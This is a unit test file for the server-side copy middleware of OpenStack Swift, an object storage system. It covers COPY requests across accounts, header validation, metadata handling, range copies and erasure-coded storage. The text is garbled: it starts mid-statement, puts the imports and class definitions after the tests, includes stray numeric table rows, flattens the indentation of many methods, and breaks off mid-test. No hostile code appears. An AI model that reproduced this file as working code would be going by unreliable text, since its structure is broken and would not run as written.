headers={'Destination': 'c2/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c2/o', self.authorized[1].path)
def test_COPY_source_with_slashes_in_name(self):
self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o/o2',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': 'c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a/c/o', path)
self.assertTrue(('X-Copied-From', 'c/o/o2') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o', self.authorized[1].path)
def test_COPY_account_source_with_slashes_in_name(self):
self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o/o2',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': 'c1/o',
'Destination-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a1/c1/o', path)
self.assertTrue(('X-Copied-From', 'c/o/o2') in headers)
self.assertTrue(('X-Copied-From-Account', 'a') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a1/c1/o', self.authorized[1].path)
def test_COPY_destination_leading_slash(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o', self.authorized[1].path)
def test_COPY_account_destination_leading_slash(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c1/o',
'Destination-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a1/c1/o', path)
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertTrue(('X-Copied-From-Account', 'a') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a1/c1/o', self.authorized[1].path)
def test_COPY_source_with_slashes_destination_leading_slash(self):
self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o/o2',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a/c/o', path)
self.assertTrue(('X-Copied-From', 'c/o/o2') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o', self.authorized[1].path)
def test_COPY_account_source_with_slashes_destination_leading_slash(self):
self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o/o2',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c1/o',
'Destination-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a1/c1/o', path)
self.assertTrue(('X-Copied-From', 'c/o/o2') in headers)
self.assertTrue(('X-Copied-From-Account', 'a') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a1/c1/o', self.authorized[1].path)
def test_COPY_no_object_in_destination(self):
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': 'c_o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '412 Precondition Failed')
def test_COPY_account_no_object_in_destination(self):
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': 'c_o',
'Destination-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '412 Precondition Failed')
def test_COPY_account_bad_destination_account(self):
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c/o',
'Destination-Account': '/i/am/bad'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '412 Precondition Failed')
def test_COPY_server_error_reading_source(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPServiceUnavailable, {})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '503 Service Unavailable')
self.assertEqual(len(self.authorized), 1)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
def test_COPY_account_server_error_reading_source(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPServiceUnavailable, {})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c1/o',
'Destination-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '503 Service Unavailable')
self.assertEqual(len(self.authorized), 1)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
def test_COPY_not_found_reading_source(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPNotFound, {})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '404 Not Found')
self.assertEqual(len(self.authorized), 1)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
def test_COPY_account_not_found_reading_source(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPNotFound, {})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c1/o',
'Destination-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '404 Not Found')
self.assertEqual(len(self.authorized), 1)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
def test_COPY_with_metadata(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, "passed")
self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c/o',
'X-Object-Meta-Ours': 'okay'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a/c/o', path)
self.assertEqual(req_headers['X-Object-Meta-Ours'], 'okay')
self.assertTrue(('X-Object-Meta-Ours', 'okay') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o', self.authorized[1].path)
def test_COPY_account_with_metadata(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, "passed")
self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c1/o',
'X-Object-Meta-Ours': 'okay',
'Destination-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a1/c1/o', path)
self.assertEqual(req_headers['X-Object-Meta-Ours'], 'okay')
self.assertTrue(('X-Object-Meta-Ours', 'okay') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a1/c1/o', self.authorized[1].path)
def test_COPY_source_zero_content_length(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, None)
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '413 Request Entity Too Large')
self.assertEqual(len(self.authorized), 1)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
def test_COPY_source_larger_than_max_file_size(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, "largebody")
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c/o'})
with mock.patch('swift.common.middleware.copy.'
'MAX_FILE_SIZE', 1):
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '413 Request Entity Too Large')
self.assertEqual(len(self.authorized), 1)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
def test_COPY_account_source_zero_content_length(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, None)
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c/o',
'Destination-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '413 Request Entity Too Large')
self.assertEqual(len(self.authorized), 1)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
def test_COPY_account_source_larger_than_max_file_size(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, "largebody")
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c1/o',
'Destination-Account': 'a1'})
with mock.patch('swift.common.middleware.copy.'
'MAX_FILE_SIZE', 1):
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '413 Request Entity Too Large')
self.assertEqual(len(self.authorized), 1)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
def test_COPY_newest(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk,
{'Last-Modified': '123'}, "passed")
self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From-Last-Modified', '123') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o', self.authorized[1].path)
def test_COPY_account_newest(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk,
{'Last-Modified': '123'}, "passed")
self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c1/o',
'Destination-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From-Last-Modified', '123') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a1/c1/o', self.authorized[1].path)
def test_COPY_in_OPTIONS_response(self):
self.app.register('OPTIONS', '/v1/a/c/o', swob.HTTPOk,
{'Allow': 'GET, PUT'})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'OPTIONS'}, headers={})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '200 OK')
calls = self.app.calls_with_headers
method, path, req_headers = calls[0]
self.assertEqual('OPTIONS', method)
self.assertEqual('/v1/a/c/o', path)
self.assertTrue(('Allow', 'GET, PUT, COPY') in headers)
self.assertEqual(len(self.authorized), 1)
self.assertEqual('OPTIONS', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
# For basic test cases, assert orig_req_method behavior
self.assertNotIn('swift.orig_req_method', req.environ)
def test_COPY_in_OPTIONS_response_CORS(self):
self.app.register('OPTIONS', '/v1/a/c/o', swob.HTTPOk,
{'Allow': 'GET, PUT',
'Access-Control-Allow-Methods': 'GET, PUT'})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'OPTIONS'}, headers={})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '200 OK')
calls = self.app.calls_with_headers
method, path, req_headers = calls[0]
self.assertEqual('OPTIONS', method)
self.assertEqual('/v1/a/c/o', path)
self.assertTrue(('Allow', 'GET, PUT, COPY') in headers)
self.assertTrue(('Access-Control-Allow-Methods',
'GET, PUT, COPY') in headers)
self.assertEqual(len(self.authorized), 1)
self.assertEqual('OPTIONS', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
    def _test_COPY_source_headers(self, extra_put_headers):
        """COPY /v1/a/c/o to /v1/a/c1/o with *extra_put_headers* added.

        Registers a source GET whose response carries a representative mix
        of metadata (user meta, sysmeta, transient sysmeta, timestamps) and
        returns the headers the middleware sent with the backend PUT, so
        callers can assert exactly what was carried over or replaced.
        """
        # helper method to perform a COPY with some metadata headers that
        # should always be sent to the destination
        put_headers = {'Destination': '/c1/o',
                       'X-Object-Meta-Test2': 'added',
                       'X-Object-Sysmeta-Test2': 'added',
                       'X-Object-Transient-Sysmeta-Test2': 'added'}
        put_headers.update(extra_put_headers)
        get_resp_headers = {
            'X-Timestamp': '1234567890.12345',
            'X-Backend-Timestamp': '1234567890.12345',
            'Content-Type': 'text/original',
            'Content-Encoding': 'gzip',
            'Content-Disposition': 'attachment; filename=myfile',
            'X-Object-Meta-Test': 'original',
            'X-Object-Sysmeta-Test': 'original',
            'X-Object-Transient-Sysmeta-Test': 'original',
            'X-Foo': 'Bar'}
        self.app.register(
            'GET', '/v1/a/c/o', swob.HTTPOk, headers=get_resp_headers)
        self.app.register('PUT', '/v1/a/c1/o', swob.HTTPCreated, {})
        req = Request.blank('/v1/a/c/o', method='COPY', headers=put_headers)
        status, headers, body = self.call_ssc(req)
        self.assertEqual(status, '201 Created')
        calls = self.app.calls_with_headers
        self.assertEqual(2, len(calls))
        method, path, req_headers = calls[1]
        self.assertEqual('PUT', method)
        # these headers should always be applied to the destination
        self.assertEqual('added', req_headers.get('X-Object-Meta-Test2'))
        self.assertEqual('added', req_headers.get('X-Object-Sysmeta-Test2'))
        self.assertEqual('added',
                         req_headers.get('X-Object-Transient-Sysmeta-Test2'))
        return req_headers
def test_COPY_source_headers_no_updates(self):
# copy should preserve existing metadata if not updated
req_headers = self._test_COPY_source_headers({})
self.assertEqual('text/original', req_headers.get('Content-Type'))
self.assertEqual('gzip', req_headers.get('Content-Encoding'))
self.assertEqual('attachment; filename=myfile',
req_headers.get('Content-Disposition'))
self.assertEqual('original', req_headers.get('X-Object-Meta-Test'))
self.assertEqual('original', req_headers.get('X-Object-Sysmeta-Test'))
self.assertEqual('original',
req_headers.get('X-Object-Transient-Sysmeta-Test'))
self.assertEqual('Bar', req_headers.get('X-Foo'))
self.assertNotIn('X-Timestamp', req_headers)
self.assertNotIn('X-Backend-Timestamp', req_headers)
def test_COPY_source_headers_with_updates(self):
# copy should apply any updated values to existing metadata
put_headers = {
'Content-Type': 'text/not_original',
'Content-Encoding': 'not_gzip',
'Content-Disposition': 'attachment; filename=notmyfile',
'X-Object-Meta-Test': 'not_original',
'X-Object-Sysmeta-Test': 'not_original',
'X-Object-Transient-Sysmeta-Test': 'not_original',
'X-Foo': 'Not Bar'}
req_headers = self._test_COPY_source_headers(put_headers)
self.assertEqual('text/not_original', req_headers.get('Content-Type'))
self.assertEqual('not_gzip', req_headers.get('Content-Encoding'))
self.assertEqual('attachment; filename=notmyfile',
req_headers.get('Content-Disposition'))
self.assertEqual('not_original', req_headers.get('X-Object-Meta-Test'))
self.assertEqual('not_original',
req_headers.get('X-Object-Sysmeta-Test'))
self.assertEqual('not_original',
req_headers.get('X-Object-Transient-Sysmeta-Test'))
self.assertEqual('Not Bar', req_headers.get('X-Foo'))
self.assertNotIn('X-Timestamp', req_headers)
self.assertNotIn('X-Backend-Timestamp', req_headers)
def test_COPY_x_fresh_metadata_no_updates(self):
# existing user metadata should not be copied, sysmeta is copied
put_headers = {
'X-Fresh-Metadata': 'true',
'X-Extra': 'Fresh'}
req_headers = self._test_COPY_source_headers(put_headers)
self.assertEqual('text/original', req_headers.get('Content-Type'))
self.assertEqual('Fresh', req_headers.get('X-Extra'))
self.assertEqual('original',
req_headers.get('X-Object-Sysmeta-Test'))
self.assertIn('X-Fresh-Metadata', req_headers)
self.assertNotIn('X-Object-Meta-Test', req_headers)
self.assertNotIn('X-Object-Transient-Sysmeta-Test', req_headers)
self.assertNotIn('X-Timestamp', req_headers)
self.assertNotIn('X-Backend-Timestamp', req_headers)
self.assertNotIn('Content-Encoding', req_headers)
self.assertNotIn('Content-Disposition', req_headers)
self.assertNotIn('X-Foo', req_headers)
def test_COPY_x_fresh_metadata_with_updates(self):
# existing user metadata should not be copied, new metadata replaces it
put_headers = {
'X-Fresh-Metadata': 'true',
'Content-Type': 'text/not_original',
'Content-Encoding': 'not_gzip',
'Content-Disposition': 'attachment; filename=notmyfile',
'X-Object-Meta-Test': 'not_original',
'X-Object-Sysmeta-Test': 'not_original',
'X-Object-Transient-Sysmeta-Test': 'not_original',
'X-Foo': 'Not Bar',
'X-Extra': 'Fresh'}
req_headers = self._test_COPY_source_headers(put_headers)
self.assertEqual('Fresh', req_headers.get('X-Extra'))
self.assertEqual('text/not_original', req_headers.get('Content-Type'))
self.assertEqual('not_gzip', req_headers.get('Content-Encoding'))
self.assertEqual('attachment; filename=notmyfile',
req_headers.get('Content-Disposition'))
self.assertEqual('not_original', req_headers.get('X-Object-Meta-Test'))
self.assertEqual('not_original',
req_headers.get('X-Object-Sysmeta-Test'))
self.assertEqual('not_original',
req_headers.get('X-Object-Transient-Sysmeta-Test'))
self.assertEqual('Not Bar', req_headers.get('X-Foo'))
    def test_COPY_with_single_range(self):
        # verify that source etag is not copied when copying a range
        self.app.register('GET', '/v1/a/c/o', swob.HTTPOk,
                          {'etag': 'bogus etag'}, "abcdefghijklmnop")
        self.app.register('PUT', '/v1/a/c1/o', swob.HTTPCreated, {})
        req = swob.Request.blank(
            '/v1/a/c/o', method='COPY',
            headers={'Destination': 'c1/o',
                     'Range': 'bytes=5-10'})
        status, headers, body = self.call_ssc(req)
        self.assertEqual(status, '201 Created')
        calls = self.app.calls_with_headers
        self.assertEqual(2, len(calls))
        method, path, req_headers = calls[1]
        self.assertEqual('PUT', method)
        self.assertEqual('/v1/a/c1/o', path)
        # header names are case-folded before the membership check
        self.assertNotIn('etag', (h.lower() for h in req_headers))
        # bytes 5-10 inclusive -> 6 bytes
        self.assertEqual('6', req_headers['content-length'])
        # GET the destination: it holds only the requested byte range
        req = swob.Request.blank('/v1/a/c1/o', method='GET')
        status, headers, body = self.call_ssc(req)
        self.assertEqual('fghijk', body)
@patch_policies(with_ec_default=True)
class TestServerSideCopyMiddlewareWithEC(unittest.TestCase):
    """Exercise the copy middleware with an EC default storage policy."""

    # minimal container info handed to the patched proxy app
    container_info = {
        'status': 200,
        'write_acl': None,
        'read_acl': None,
        'storage_policy': None,
        'sync_key': None,
        'versions': None,
    }

    def setUp(self):
        # proxy app with fake rings/memcache, wrapped by the copy filter
        self.logger = debug_logger('proxy-server')
        self.logger.thread_locals = ('txn1', '127.0.0.2')
        self.app = PatchedObjControllerApp(
            None, FakeMemcache(), account_ring=FakeRing(),
            container_ring=FakeRing(), logger=self.logger)
        self.ssc = copy.filter_factory({})(self.app)
        self.ssc.logger = self.app.logger
        self.policy = POLICIES.default
        self.app.container_info = dict(self.container_info)

    def test_COPY_with_single_range(self):
        # Range COPY of an EC object: no fragment PUT may carry the source
        # object's etag.
        req = swob.Request.blank(
            '/v1/a/c/o', method='COPY',
            headers={'Destination': 'c1/o',
                     'Range': 'bytes=5-10'})
        # turn a real body into fragments
        segment_size = self.policy.ec_segment_size
        real_body = ('asdf' * segment_size)[:-10]
        # split it up into chunks
        chunks = [real_body[x:x + segment_size]
                  for x in range(0, len(real_body), segment_size)]
        # we need only first chunk to rebuild 5-10 range
        fragments = self.policy.pyeclib_driver.encode(chunks[0])
        fragment_payloads = []
        fragment_payloads.append(fragments)
        node_fragments = zip(*fragment_payloads)
        self.assertEqual(len(node_fragments),
                         self.policy.object_ring.replicas)  # sanity
        headers = {'X-Object-Sysmeta-Ec-Content-Length': str(len(real_body))}
        responses = [(200, ''.join(node_fragments[i]), headers)
                     for i in range(POLICIES.default.ec_ndata)]
        responses += [(201, '', {})] * self.policy.object_ring.replicas
        status_codes, body_iter, headers = zip(*responses)
        expect_headers = {
            'X-Obj-Metadata-Footer': 'yes',
            'X-Obj-Multiphase-Commit': 'yes'
        }
        put_hdrs = []

        def capture_conn(host, port, dev, part, method, path, *args, **kwargs):
            # record the headers of every backend PUT for inspection below
            if method == 'PUT':
                put_hdrs.append(args[0])

        with set_http_connect(*status_codes, body_iter=body_iter,
                              headers=headers, expect_headers=expect_headers,
                              give_connect=capture_conn):
            resp = req.get_response(self.ssc)
        self.assertEqual(resp.status_int, 201)
        expected_puts = POLICIES.default.ec_ndata + POLICIES.default.ec_nparity
        self.assertEqual(expected_puts, len(put_hdrs))
        for hdrs in put_hdrs:
            # etag should not be copied from source
            self.assertNotIn('etag', (h.lower() for h in hdrs))

    def test_COPY_with_invalid_ranges(self):
        # real body size is segment_size - 10 (just 1 segment)
        segment_size = self.policy.ec_segment_size
        real_body = ('a' * segment_size)[:-10]

        # range is out of real body but in segment size
        self._test_invalid_ranges('COPY', real_body,
                                  segment_size, '%s-' % (segment_size - 10))
        # range is out of both real body and segment size
        self._test_invalid_ranges('COPY', real_body,
                                  segment_size, '%s-' % (segment_size + 10))

    def _test_invalid_ranges(self, method, real_body, segment_size, req_range):
        # make a request with range starts from more than real size.
        # the middleware/proxy must answer 416 with the standard error body
        # and the EC etag of the whole object.
        body_etag = md5(real_body).hexdigest()
        req = swob.Request.blank(
            '/v1/a/c/o', method=method,
            headers={'Destination': 'c1/o',
                     'Range': 'bytes=%s' % (req_range)})
        fragments = self.policy.pyeclib_driver.encode(real_body)
        fragment_payloads = [fragments]
        node_fragments = zip(*fragment_payloads)
        self.assertEqual(len(node_fragments),
                         self.policy.object_ring.replicas)  # sanity
        headers = {'X-Object-Sysmeta-Ec-Content-Length': str(len(real_body)),
                   'X-Object-Sysmeta-Ec-Etag': body_etag}
        start = int(req_range.split('-')[0])
        self.assertTrue(start >= 0)  # sanity
        title, exp = swob.RESPONSE_REASONS[416]
        range_not_satisfiable_body = \
            '<html><h1>%s</h1><p>%s</p></html>' % (title, exp)
        # beyond the segment the object servers themselves return 416;
        # within the segment they return data and the proxy computes 416
        if start >= segment_size:
            responses = [(416, range_not_satisfiable_body, headers)
                         for i in range(POLICIES.default.ec_ndata)]
        else:
            responses = [(200, ''.join(node_fragments[i]), headers)
                         for i in range(POLICIES.default.ec_ndata)]
        status_codes, body_iter, headers = zip(*responses)
        expect_headers = {
            'X-Obj-Metadata-Footer': 'yes',
            'X-Obj-Multiphase-Commit': 'yes'
        }
        # TODO possibly use FakeApp here
        with set_http_connect(*status_codes, body_iter=body_iter,
                              headers=headers, expect_headers=expect_headers):
            resp = req.get_response(self.ssc)
        self.assertEqual(resp.status_int, 416)
        self.assertEqual(resp.content_length, len(range_not_satisfiable_body))
        self.assertEqual(resp.body, range_not_satisfiable_body)
        self.assertEqual(resp.etag, body_etag)
        self.assertEqual(resp.headers['Accept-Ranges'], 'bytes')
| 50.193594
| 79
| 0.580344
|
import mock
import unittest
from hashlib import md5
from six.moves import urllib
from swift.common import swob
from swift.common.middleware import copy
from swift.common.storage_policy import POLICIES
from swift.common.swob import Request, HTTPException
from swift.common.utils import closing_if_possible
from test.unit import patch_policies, debug_logger, FakeMemcache, FakeRing
from test.unit.common.middleware.helpers import FakeSwift
from test.unit.proxy.controllers.test_obj import set_http_connect, \
PatchedObjControllerApp
class TestCopyConstraints(unittest.TestCase):
    """Validate the X-Copy-From / Destination header parsing helpers."""

    def test_validate_copy_from(self):
        # each header value should parse into a (container, object) pair
        for value, expected in [('c/o2', ('c', 'o2')),
                                ('c/subdir/o2', ('c', 'subdir/o2')),
                                ('/c/o2', ('c', 'o2'))]:
            req = Request.blank(
                '/v/a/c/o',
                headers={'x-copy-from': value})
            self.assertEqual(
                expected, copy._check_copy_from_header(req))

    def test_validate_bad_copy_from(self):
        # a value without a container/object separator must raise
        req = Request.blank(
            '/v/a/c/o',
            headers={'x-copy-from': 'bad_object'})
        self.assertRaises(HTTPException,
                          copy._check_copy_from_header, req)

    def test_validate_destination(self):
        # same parsing rules apply to the Destination header
        for value, expected in [('c/o2', ('c', 'o2')),
                                ('c/subdir/o2', ('c', 'subdir/o2')),
                                ('/c/o2', ('c', 'o2'))]:
            req = Request.blank(
                '/v/a/c/o',
                headers={'destination': value})
            self.assertEqual(
                expected, copy._check_destination_header(req))

    def test_validate_bad_destination(self):
        req = Request.blank(
            '/v/a/c/o',
            headers={'destination': 'bad_object'})
        self.assertRaises(HTTPException,
                          copy._check_destination_header, req)
class TestServerSideCopyMiddleware(unittest.TestCase):
    def setUp(self):
        # route all requests through the copy filter wrapped around FakeSwift
        self.app = FakeSwift()
        self.ssc = copy.filter_factory({})(self.app)
        self.ssc.logger = self.app.logger
    def tearDown(self):
        # every registered response body must have been consumed/closed
        self.assertEqual(self.app.unclosed_requests, {})
    def call_app(self, req, app=None, expect_exception=False):
        """Drive *req* through *app* as a WSGI call and collect the result.

        Installs a capturing ``swift.authorize`` callback (requests end up
        in ``self.authorized``) unless one is already present, then returns
        ``(status, headers, body)`` — with the caught exception appended
        when *expect_exception* is True.
        """
        if app is None:
            app = self.app

        self.authorized = []

        def authorize(req):
            self.authorized.append(req)

        if 'swift.authorize' not in req.environ:
            req.environ['swift.authorize'] = authorize

        req.headers.setdefault("User-Agent", "Bruce Wayne")

        # captured via the start_response callable below
        status = [None]
        headers = [None]

        def start_response(s, h, ei=None):
            status[0] = s
            headers[0] = h

        body_iter = app(req.environ, start_response)
        body = ''
        caught_exc = None
        try:
            # consume inside closing_if_possible so the app iter is closed
            # even when iteration raises
            with closing_if_possible(body_iter):
                for chunk in body_iter:
                    body += chunk
        except Exception as exc:
            if expect_exception:
                caught_exc = exc
            else:
                raise

        if expect_exception:
            return status[0], headers[0], body, caught_exc
        else:
            return status[0], headers[0], body
    def call_ssc(self, req, **kwargs):
        # convenience wrapper: run the request through the copy middleware
        return self.call_app(req, app=self.ssc, **kwargs)
def assertRequestEqual(self, req, other):
self.assertEqual(req.method, other.method)
self.assertEqual(req.path, other.path)
def test_no_object_in_path_pass_through(self):
self.app.register('PUT', '/v1/a/c', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c', method='PUT')
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertEqual(len(self.authorized), 1)
self.assertRequestEqual(req, self.authorized[0])
def test_object_pass_through_methods(self):
for method in ['DELETE', 'GET', 'HEAD', 'REPLICATE']:
self.app.register(method, '/v1/a/c/o', swob.HTTPOk, {})
req = Request.blank('/v1/a/c/o', method=method)
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '200 OK')
self.assertEqual(len(self.authorized), 1)
self.assertRequestEqual(req, self.authorized[0])
self.assertNotIn('swift.orig_req_method', req.environ)
def test_basic_put_with_x_copy_from(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed')
